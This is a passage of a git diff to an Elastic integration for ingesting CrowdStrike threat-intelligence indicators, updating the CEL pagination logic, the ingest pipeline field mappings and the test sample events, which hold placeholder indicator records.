"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339},{\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339}],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"],\"vulnerabilities\":[\"vuln\"]}", + "original": "{\"id\":\"domain_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193\",\"indicator\":\"e88808f192bf563824cd448b1c853742b78f42b9990192b83d\",\"type\":\"domain\",\"deleted\":true,\"published_date\":1700547346,\"last_updated\":1700547469,\"reports\":[\"reports\"],\"actors\":[\"SALTYSPIDER\"],\"malware_families\":[\"Trojan\"],\"kill_chains\":[\"Installation\",\"C2\"],\"ip_address_types\":[\"C2\"],\"domain_types\":[\"domain.com\"],\"malicious_confidence\":\"low\",\"_marker\":\"1800547361df353d123235e4158c5c81f25f0\",\"labels\":[{\"name\":\"MaliciousConfidence/High\",\"created_on\":1700547390,\"last_valid_on\":1700547390},{\"name\":\"Malware/Mofksys\",\"created_on\":1700547369,\"last_valid_on\":1700547369},{\"name\":\"ThreatType/Commodity\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/CredentialHarvesting\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/InformationStealer\",\"created_on\":1700547359,\"last_valid_on\":1700547359}],\"relations\":[{\"id\":\"domain.com.xx\",\"indicator\":\"domain.xx\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339},{\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339}],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"],\"vulnerabilities\":[\"vuln\"]}", "type": [ "indicator" ] }, - "related": { - "ip": [ - "81.2.69.192" - ] - }, "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" @@ -309,7 +304,7 @@ ], "id": "domain_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193", "ip_address_types": [ - "81.2.69.192" + "C2" ], "kill_chains": [ "Installation", @@ -387,6 +382,467 @@ "vuln" ] } + }, + { + "@timestamp": "2024-02-14T19:19:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "threat" + ], + "id": "hash_md5_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193", + "kind": "enrichment", + "original": "{\"_marker\":\"17005473618d17ae6353d123235e4158c5c81f25f0\",\"actors\":[],\"deleted\":false,\"domain_types\":[],\"id\":\"hash_md5_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193\",\"indicator\":\"e52faef955f651da029a4ee4fa227c0f\",\"ip_address_types\":[],\"kill_chains\":[],\"labels\":[{\"created_on\":1707938343,\"last_valid_on\":1707938355,\"name\":\"MaliciousConfidence/High\"},{\"created_on\":1707938347,\"last_valid_on\":1707938347,\"name\":\"Malware/STOP\"},{\"created_on\":1707938347,\"last_valid_on\":1707938347,\"name\":\"ThreatType/Criminal\"},{\"created_on\":1707938347,\"last_valid_on\":1707938347,\"name\":\"ThreatType/Ransomware\"}],\"last_updated\":1707938355,\"malicious_confidence\":\"high\",\"malware_families\":[\"STOP\"],\"published_date\":1707938343,\"relations\":[],\"reports\":[],\"targets\":[],\"threat_types\":[\"Criminal\",\"Ransomware\"],\"type\":\"hash_md5\",\"vulnerabilities\":[]}", + "type": [ + "indicator" + ] + }, + "related": { + "hash": [ + "e52faef955f651da029a4ee4fa227c0f" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "e52faef955f651da029a4ee4fa227c0f" + } + }, + "name": "e52faef955f651da029a4ee4fa227c0f", + "provider": "crowdstrike", + "type": "file" + } + }, + "ti_crowdstrike": { + "intel": { + "_marker": "17005473618d17ae6353d123235e4158c5c81f25f0", + "deleted": false, + "id": "hash_md5_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193", + "labels": [ + { + "created_on": "2024-02-14T19:19:03.000Z", + "last_valid_on": "2024-02-14T19:19:15.000Z", + "name": "MaliciousConfidence/High" + }, + { + "created_on": "2024-02-14T19:19:07.000Z", + "last_valid_on": "2024-02-14T19:19:07.000Z", + "name": "Malware/STOP" + }, + { + "created_on": "2024-02-14T19:19:07.000Z", + "last_valid_on": "2024-02-14T19:19:07.000Z", + "name": "ThreatType/Criminal" + }, + { + "created_on": "2024-02-14T19:19:07.000Z", + "last_valid_on": "2024-02-14T19:19:07.000Z", + "name": "ThreatType/Ransomware" + } + ], + "last_updated": "2024-02-14T19:19:15.000Z", + "malicious_confidence": "high", + "malware_families": [ + "STOP" + ], + "published_date": "2024-02-14T19:19:03.000Z", + "threat_types": [ + "Criminal", + "Ransomware" + ], + "type": "hash_md5", + "value": "e52faef955f651da029a4ee4fa227c0f" + } + } + }, + { + "@timestamp": "2023-11-21T06:17:51.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "threat" + ], + "id": "hash_sha1_abcdxxxxxx", + "kind": "enrichment", + "original": "{\"id\":\"hash_sha1_abcdxxxxxx\",\"indicator\":\"t98f1xxxxxxxxxxxxxxc853742b78f42b9990192b83d\",\"type\":\"hash_sha1\",\"deleted\":true,\"published_date\":1700547349,\"last_updated\":1700547471,\"reports\":[\"reports\"],\"actors\":[\"SALTYSPIDER\"],\"malware_families\":[\"Trojan\"],\"kill_chains\":[\"Installation\",\"C2\"],\"ip_address_types\":[\"81.2.69.192\"],\"domain_types\":[\"domain.com\"],\"malicious_confidence\":\"low\",\"_marker\":\"1000547361df353d123235e4158c5c81f456f0\",\"labels\":[{\"name\":\"MaliciousConfidence/High\",\"created_on\":1700547390,\"last_valid_on\":1700547390},{\"name\":\"Malware/Mofksys\",\"created_on\":1700547369,\"last_valid_on\":1700547369},{\"name\":\"ThreatType/Commodity\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/CredentialHarvesting\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/InformationStealer\",\"created_on\":1700547359,\"last_valid_on\":1700547359}],\"relations\":[{\"id\":\"domain.com.xx\",\"indicator\":\"domain.xx\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339},{\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339}],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"],\"vulnerabilities\":[\"vuln\"]}", + "type": [ + "indicator" + ] + }, + "related": { + "hash": [ + "t98f1xxxxxxxxxxxxxxc853742b78f42b9990192b83d" + ], + "ip": [ + "81.2.69.192" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "confidence": "Low", + "file": { + "hash": { + "sha1": "t98f1xxxxxxxxxxxxxxc853742b78f42b9990192b83d" + } + }, + "name": "t98f1xxxxxxxxxxxxxxc853742b78f42b9990192b83d", + "provider": "crowdstrike", + "type": "file" + } + }, + "ti_crowdstrike": { + "intel": { + "_marker": "1000547361df353d123235e4158c5c81f456f0", + "actors": [ + "SALTYSPIDER" + ], + "deleted": true, + "domain_types": [ + "domain.com" + ], + "id": "hash_sha1_abcdxxxxxx", + "ip_address_types": [ + "81.2.69.192" + ], + "kill_chains": [ + "Installation", + "C2" + ], + "labels": [ + { + "created_on": "2023-11-21T06:16:30.000Z", + "last_valid_on": "2023-11-21T06:16:30.000Z", + "name": "MaliciousConfidence/High" + }, + { + "created_on": "2023-11-21T06:16:09.000Z", + "last_valid_on": "2023-11-21T06:16:09.000Z", + "name": "Malware/Mofksys" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/Commodity" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/CredentialHarvesting" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/InformationStealer" + } + ], + "last_updated": "2023-11-21T06:17:51.000Z", + "malicious_confidence": "low", + "malware_families": [ + "Trojan" + ], + "published_date": "2023-11-21T06:15:49.000Z", + "relations": [ + { + "created_date": "2023-11-21T06:15:39.000Z", + "id": "domain.com.xx", + "indicator": "domain.xx", + "last_valid_date": "2023-11-21T06:15:39.000Z", + "type": "domain" + }, + { + "created_date": "2023-11-21T06:15:39.000Z", + "id": "domain.xx.yy", + "indicator": "domain.xx.fd", + "last_valid_date": "2023-11-21T06:15:39.000Z", + "type": "domain" + } + ], + "reports": [ + "reports" + ], + "targets": [ + "abc" + ], + "threat_types": [ + "Commodity", + "CredentialHarvesting", + "InformationStealer" + ], + "type": "hash_sha1", + "value": "t98f1xxxxxxxxxxxxxxc853742b78f42b9990192b83d", + "vulnerabilities": [ + "vuln" + ] + } + }, + "vulnerability": { + "category": [ + "vuln" + ] + } + }, + { + "@timestamp": "2023-11-21T06:18:01.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "threat" + ], + "id": "url_dddxxx", + "kind": "enrichment", + "original": "{\"id\":\"url_dddxxx\",\"indicator\":\"www.example.com\",\"type\":\"url\",\"deleted\":false,\"published_date\":1700547349,\"last_updated\":1700547481,\"reports\":[\"reports\"],\"actors\":[\"SALTYSPIDER\"],\"malware_families\":[\"Trojan\"],\"kill_chains\":[\"Installation\",\"C2\"],\"ip_address_types\":[\"81.2.69.192\"],\"domain_types\":[\"abc.com\"],\"malicious_confidence\":\"medium\",\"_marker\":\"1000547361df3d123235e4158c5c81f456f0\",\"labels\":[{\"name\":\"MaliciousConfidence/High\",\"created_on\":1700547391,\"last_valid_on\":1700547391},{\"name\":\"Malware/Mofksys\",\"created_on\":1700547369,\"last_valid_on\":1700547369},{\"name\":\"ThreatType/Commodity\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/CredentialHarvesting\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/InformationStealer\",\"created_on\":1700547359,\"last_valid_on\":1700547359}],\"relations\":[{\"id\":\"domain.com.xx\",\"indicator\":\"domain.xx\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339},{\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339}],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"],\"vulnerabilities\":[\"vuln\"]}", + "type": [ + "indicator" + ] + }, + "related": { + "ip": [ + "81.2.69.192" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "confidence": "Medium", + "name": "www.example.com", + "provider": "crowdstrike", + "type": "url", + "url": { + "full": "www.example.com" + } + } + }, + "ti_crowdstrike": { + "intel": { + "_marker": "1000547361df3d123235e4158c5c81f456f0", + "actors": [ + "SALTYSPIDER" + ], + "deleted": false, + "domain_types": [ + "abc.com" + ], + "id": "url_dddxxx", + "ip_address_types": [ + "81.2.69.192" + ], + "kill_chains": [ + "Installation", + "C2" + ], + "labels": [ + { + "created_on": "2023-11-21T06:16:31.000Z", + "last_valid_on": "2023-11-21T06:16:31.000Z", + "name": "MaliciousConfidence/High" + }, + { + "created_on": "2023-11-21T06:16:09.000Z", + "last_valid_on": "2023-11-21T06:16:09.000Z", + "name": "Malware/Mofksys" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/Commodity" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/CredentialHarvesting" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/InformationStealer" + } + ], + "last_updated": "2023-11-21T06:18:01.000Z", + "malicious_confidence": "medium", + "malware_families": [ + "Trojan" + ], + "published_date": "2023-11-21T06:15:49.000Z", + "relations": [ + { + "created_date": "2023-11-21T06:15:39.000Z", + "id": "domain.com.xx", + "indicator": "domain.xx", + "last_valid_date": "2023-11-21T06:15:39.000Z", + "type": "domain" + }, + { + "created_date": "2023-11-21T06:15:39.000Z", + "id": "domain.xx.yy", + "indicator": "domain.xx.fd", + "last_valid_date": "2023-11-21T06:15:39.000Z", + "type": "domain" + } + ], + "reports": [ + "reports" + ], + "targets": [ + "abc" + ], + "threat_types": [ + "Commodity", + "CredentialHarvesting", + "InformationStealer" + ], + "type": "url", + "value": "www.example.com", + "vulnerabilities": [ + "vuln" + ] + } + }, + "url": { + "extension": "com", + "original": "www.example.com", + "path": "www.example.com" + }, + "vulnerability": { + "category": [ + "vuln" + ] + } + }, + { + "@timestamp": "2023-11-21T06:18:11.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "threat" + ], + "id": "ip_address_123xxxx", + "kind": "enrichment", + "original": "{\"id\":\"ip_address_123xxxx\",\"indicator\":\"81.2.69.192\",\"type\":\"ip_address\",\"deleted\":true,\"published_date\":1700547349,\"last_updated\":1700547491,\"reports\":[\"reports\"],\"actors\":[\"SALTYSPIDER\"],\"malware_families\":[\"Trojan\"],\"kill_chains\":[\"Installation\",\"C2\"],\"ip_address_types\":[\"81.2.69.192\"],\"domain_types\":[\"domain.com\"],\"malicious_confidence\":\"low\",\"_marker\":\"10005df353d123235e4158c5c81f456f0\",\"labels\":[{\"name\":\"MaliciousConfidence/High\",\"created_on\":1700547395,\"last_valid_on\":1700547396},{\"name\":\"Malware/Mofksys\",\"created_on\":1700547369,\"last_valid_on\":1700547369},{\"name\":\"ThreatType/Commodity\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/CredentialHarvesting\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/InformationStealer\",\"created_on\":1700547359,\"last_valid_on\":1700547359}],\"relations\":[{\"id\":\"domain.com.xx\",\"indicator\":\"domain.xx\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339},{\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339}],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"]}", + "type": [ + "indicator" + ] + }, + "related": { + "ip": [ + "81.2.69.192" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "confidence": "Low", + "ip": "81.2.69.192", + "name": "81.2.69.192", + "provider": "crowdstrike", + "type": "ipv4-addr" + } + }, + "ti_crowdstrike": { + "intel": { + "_marker": "10005df353d123235e4158c5c81f456f0", + "actors": [ + "SALTYSPIDER" + ], + "deleted": true, + "domain_types": [ + "domain.com" + ], + "id": "ip_address_123xxxx", + "ip_address_types": [ + "81.2.69.192" + ], + "kill_chains": [ + "Installation", + "C2" + ], + "labels": [ + { + "created_on": "2023-11-21T06:16:35.000Z", + "last_valid_on": "2023-11-21T06:16:36.000Z", + "name": "MaliciousConfidence/High" + }, + { + "created_on": "2023-11-21T06:16:09.000Z", + "last_valid_on": "2023-11-21T06:16:09.000Z", + "name": "Malware/Mofksys" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/Commodity" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/CredentialHarvesting" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/InformationStealer" + } + ], + "last_updated": "2023-11-21T06:18:11.000Z", + "malicious_confidence": "low", + "malware_families": [ + "Trojan" + ], + "published_date": "2023-11-21T06:15:49.000Z", + "relations": [ + { + "created_date": "2023-11-21T06:15:39.000Z", + "id": "domain.com.xx", + "indicator": "domain.xx", + "last_valid_date": "2023-11-21T06:15:39.000Z", + "type": "domain" + }, + { + "created_date": "2023-11-21T06:15:39.000Z", + "id": "domain.xx.yy", + "indicator": "domain.xx.fd", + "last_valid_date": "2023-11-21T06:15:39.000Z", + "type": "domain" + } + ], + "reports": [ + "reports" + ], + "targets": [ + "abc" + ], + "threat_types": [ + "Commodity", + "CredentialHarvesting", + "InformationStealer" + ], + "type": "ip_address", + "value": "81.2.69.192" + } + } } ] } \ No newline at end of file diff --git a/packages/ti_crowdstrike/data_stream/intel/agent/stream/cel.yml.hbs b/packages/ti_crowdstrike/data_stream/intel/agent/stream/cel.yml.hbs index f4c780f9550..c716222fd22 100644 --- a/packages/ti_crowdstrike/data_stream/intel/agent/stream/cel.yml.hbs +++ b/packages/ti_crowdstrike/data_stream/intel/agent/stream/cel.yml.hbs @@ -27,67 +27,65 @@ auth.oauth2: state: initial_interval: {{initial_interval}} want_more: false - offset: 0 batch_size: {{batch_size}} redact: fields: ~ program: | ( !state.want_more ? - request("GET", state.url + "/intel/combined/indicators/v1?offset=0&limit=" + string(state.batch_size) + '&filter=last_updated:>"' + ( + request("GET", state.url + "/intel/combined/indicators/v1?offset=0&sort=_marker.asc&limit=" + string(state.batch_size) + '&filter=_marker:>"' + ( has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? - state.cursor.last_timestamp + '"' + string(int(state.cursor.last_timestamp)) : - (now - duration(state.initial_interval)).format(time_layout.RFC3339) + '"' - )) + string(int(now - duration(state.initial_interval))) + ) + '"') : - request("GET", state.url + "/intel/combined/indicators/v1?offset=" + string(state.offset) + "&limit=" + string(state.batch_size) + '&filter=last_updated:>"' + ( - has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? - state.cursor.first_timestamp + '"' - : - '"' - )) - ).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { - "events": body.resources.map(e, { - "message": e.encode_json(), - }), - "want_more": has(body.meta.pagination) && (int(state.offset) + body.resources.size()) < body.meta.pagination.total, - "offset": has(body.meta.pagination) && ((int(state.offset) + body.resources.size()) < body.meta.pagination.total) ? - int(state.offset) + int(body.resources.size()) - : - 0, - "url": state.url, - "batch_size": state.batch_size, - "cursor": { - "last_timestamp": ( - has(body.resources) && body.resources.size() > 0 ? - ( - has(state.cursor) && has(state.cursor.last_timestamp) && body.resources.map(e, e.last_updated).max() < state.cursor.last_timestamp ? - state.cursor.last_timestamp - : - body.resources.map(e, e.last_updated).max() - ) - : - ( - has(state.cursor) && has(state.cursor.last_timestamp) ? - state.cursor.last_timestamp - : - null - ) - ), - "first_timestamp": ( - has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? - ( - state.want_more ? - state.cursor.first_timestamp - : - state.cursor.last_timestamp - ) - : - (now - duration(state.initial_interval)).format(time_layout.RFC3339) - ), - }, - })) + request("GET", state.url + string(state.next_url[0])) + ).do_request().as(resp, + resp.StatusCode == 200 ? + bytes(resp.Body).decode_json().as(body, { + "events": body.resources.map(e, { + "message": e.encode_json(), + }), + "want_more": "Next-Page" in resp.Header, + "url": state.url, + "batch_size": state.batch_size, + "initial_interval": state.initial_interval, + "next_url": "Next-Page" in resp.Header ? resp.Header["Next-Page"] : "", + "cursor": { + "last_timestamp": ( + has(body.resources) && body.resources.size() > 0 ? + ( + has(state.cursor) && has(state.cursor.last_timestamp) && body.resources.map(e, e.last_updated).max() < state.cursor.last_timestamp ? + state.cursor.last_timestamp + : + body.resources.map(e, e.last_updated).max() + ) + : + ( + has(state.cursor) && has(state.cursor.last_timestamp) ? + state.cursor.last_timestamp + : + null + ) + ), + }, + }) + : + { + "events": { + "error": { + "code": string(resp.StatusCode), + "id": string(resp.Status), + "message": string(resp.Body) + }, + }, + "want_more": false, + "url": state.url, + "batch_size": state.batch_size, + "initial_interval": state.initial_interval, + } + ) tags: {{#if preserve_original_event}} - preserve_original_event diff --git a/packages/ti_crowdstrike/data_stream/intel/elasticsearch/ingest_pipeline/default.yml b/packages/ti_crowdstrike/data_stream/intel/elasticsearch/ingest_pipeline/default.yml index 9cdeb96d68d..e4e60c73b9e 100644 --- a/packages/ti_crowdstrike/data_stream/intel/elasticsearch/ingest_pipeline/default.yml +++ b/packages/ti_crowdstrike/data_stream/intel/elasticsearch/ingest_pipeline/default.yml @@ -32,6 +32,7 @@ processors: - json: field: event.original tag: json_event_original + if: ctx.event?.original != null target_field: json on_failure: - append: @@ -79,41 +80,26 @@ processors: ignore_missing: true - foreach: field: ti_crowdstrike.intel.ip_address_types - tag: foreach_ti_crowdstrike_intel_ip_address_types + tag: foreach_ti_crowdstrike_intel_ip_address_types_append_into_related_ip if: ctx.ti_crowdstrike?.intel?.ip_address_types instanceof List + processor: + append: + field: related.ip + tag: append_ip_address_types_into_related_ip + value: '{{{_ingest._value}}}' + allow_duplicates: false + - foreach: + field: related.ip + tag: foreach_related_ip + if: ctx.related?.ip instanceof List processor: convert: field: _ingest._value - tag: convert_ti_crowdstrike_intel_ip_address_types + tag: convert_related_ip_to_ip type: ip - ignore_missing: true on_failure: - remove: field: _ingest._value - ignore_missing: true - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: ti_crowdstrike.intel.ip_address_types - tag: foreach_ti_crowdstrike_intel_ip_address_types_append_into_threat_indicator_ip - if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.type.contains('ip_address') && ctx.ti_crowdstrike?.intel?.ip_address_types instanceof List - processor: - append: - field: threat.indicator.ip - tag: append_intel_ip_address_types_into_threat_indicator_ip - value: '{{{_ingest._value}}}' - allow_duplicates: false - - foreach: - field: ti_crowdstrike.intel.ip_address_types - tag: foreach_ti_crowdstrike_intel_ip_address_types_append_into_related_ip - if: ctx.ti_crowdstrike?.intel?.ip_address_types instanceof List - processor: - append: - field: related.ip - tag: append_intel_ip_address_types_into_related_ip - value: '{{{_ingest._value}}}' - allow_duplicates: false - rename: field: json.kill_chains tag: rename_kill_chains @@ -324,6 +310,7 @@ processors: file_path: file hash_ion: file hash_md5: file + hash_sha1: file hash_sha256: file ip_address: ipv4-addr ip_address_block: ipv4-addr @@ -349,25 +336,54 @@ processors: target_field: ti_crowdstrike.intel.value ignore_missing: true - set: - field: file.hash.sha256 - tag: set_file_hash_sha256 + field: threat.indicator.file.hash.sha256 + tag: set_threat_indicator_file_hash_sha256 value: '{{{ti_crowdstrike.intel.value}}}' if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.type.contains('hash_sha256') && ctx.ti_crowdstrike?.intel?.value != null - set: - field: file.hash.md5 - tag: set_file_hash_md5 + field: threat.indicator.file.hash.sha1 + tag: set_threat_indicator_file_hash_sha1 + value: '{{{ti_crowdstrike.intel.value}}}' + if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.value != null && ctx.ti_crowdstrike.intel.type.contains('hash_sha1') + - set: + field: threat.indicator.file.hash.md5 + tag: set_threat_indicator_file_hash_md5 value: '{{{ti_crowdstrike.intel.value}}}' if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.type.contains('hash_md5') && ctx.ti_crowdstrike?.intel?.value != null + - set: + field: threat.indicator.url.full + tag: set_threat_indicator_url_full + value: '{{{ti_crowdstrike.intel.value}}}' + if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.type.contains('url') && ctx.ti_crowdstrike?.intel?.value != null + - uri_parts: + field: threat.indicator.url.full + tag: uri_parts_threat_indicator_url_full + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: threat.indicator.type tag: set_threat_indicator_type_to_ipv6_addr value: ipv6-addr if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.type.contains('ip_address') && ctx.ti_crowdstrike?.intel?.value != null && ctx.ti_crowdstrike.intel.value.contains(":") + - convert: + field: ti_crowdstrike.intel.value + tag: convert_intel_value_to_ip_and_set_threat_indicator_ip + target_field: threat.indicator.ip + type: ip + if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.type.contains('ip_address') && ctx.ti_crowdstrike?.intel?.value != '' + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: related.hash tag: append_intel_value_into_related_hash value: '{{{ti_crowdstrike.intel.value}}}' - if: ctx.ti_crowdstrike?.intel?.type != null && ['hash_ion', 'hash_md5', 'hash_sha256', 'hash_sha2'].contains(ctx.ti_crowdstrike.intel.type) + if: ctx.ti_crowdstrike?.intel?.type != null && ['hash_ion', 'hash_md5', 'hash_sha256', 'hash_sha1'].contains(ctx.ti_crowdstrike.intel.type) allow_duplicates: false - set: field: threat.indicator.name diff --git a/packages/ti_crowdstrike/data_stream/intel/fields/fields.yml b/packages/ti_crowdstrike/data_stream/intel/fields/fields.yml index f1a5d7a7df7..814fbb641a5 100644 --- a/packages/ti_crowdstrike/data_stream/intel/fields/fields.yml +++ b/packages/ti_crowdstrike/data_stream/intel/fields/fields.yml @@ -22,7 +22,7 @@ type: keyword description: A unique identifier for the Intel Indicator. - name: ip_address_types - type: ip + type: keyword description: Information related to IP address types associated with the Intel Indicator. - name: kill_chains type: keyword diff --git a/packages/ti_crowdstrike/data_stream/intel/manifest.yml b/packages/ti_crowdstrike/data_stream/intel/manifest.yml index 3c038ab2a83..38073114f8f 100644 --- a/packages/ti_crowdstrike/data_stream/intel/manifest.yml +++ b/packages/ti_crowdstrike/data_stream/intel/manifest.yml @@ -1,5 +1,6 @@ title: Collect Intel logs from CrowdStrike Falcon Intelligence. type: logs +ilm_policy: logs-ti_crowdstrike.intel-default_policy streams: - input: cel title: Intel logs diff --git a/packages/ti_crowdstrike/data_stream/intel/sample_event.json b/packages/ti_crowdstrike/data_stream/intel/sample_event.json index 521934f64c2..243719823f2 100644 --- a/packages/ti_crowdstrike/data_stream/intel/sample_event.json +++ b/packages/ti_crowdstrike/data_stream/intel/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2023-11-21T06:16:01.000Z", "agent": { - "ephemeral_id": "91894e79-85f9-4358-897b-3e25722c7277", - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "ephemeral_id": "ee250a38-ef6d-486c-a245-6d0dd0785a11", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.0" }, "data_stream": { "dataset": "ti_crowdstrike.intel", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "snapshot": false, - "version": "8.11.0" + "version": "8.12.0" }, "event": { "agent_id_status": "verified", @@ -27,18 +27,13 @@ ], "dataset": "ti_crowdstrike.intel", "id": "hash_sha256_c98e1a7f563824cd448b47613743dcd1c853742b78f42b000192b83d", - "ingested": "2024-01-11T11:53:46Z", + "ingested": "2024-03-28T10:49:11Z", "kind": "enrichment", "original": "{\"_marker\":\"17005473618d17ae6353d123235e4158c5c81f25f0\",\"actors\":[\"SALTYSPIDER\"],\"deleted\":false,\"domain_types\":[\"abc.com\"],\"id\":\"hash_sha256_c98e1a7f563824cd448b47613743dcd1c853742b78f42b000192b83d\",\"indicator\":\"c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d\",\"ip_address_types\":[\"81.2.69.192\"],\"kill_chains\":[\"Installation\",\"C2\"],\"labels\":[{\"created_on\":1700547356,\"last_valid_on\":1700547360,\"name\":\"MaliciousConfidence/High\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"Malware/Mofksys\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"ThreatType/Commodity\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"ThreatType/CredentialHarvesting\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"ThreatType/InformationStealer\"}],\"last_updated\":1700547361,\"malicious_confidence\":\"high\",\"malware_families\":[\"Mofksys\"],\"published_date\":1700547356,\"relations\":[{\"created_date\":1700547339,\"id\":\"domain.com.yy\",\"indicator\":\"domain.ds\",\"last_valid_date\":1700547339,\"type\":\"domain\"},{\"created_date\":1700547339,\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"last_valid_date\":1700547339,\"type\":\"domain\"}],\"reports\":[\"reports\"],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"],\"type\":\"hash_sha256\",\"vulnerabilities\":[\"vuln\"]}", "type": [ "indicator" ] }, - 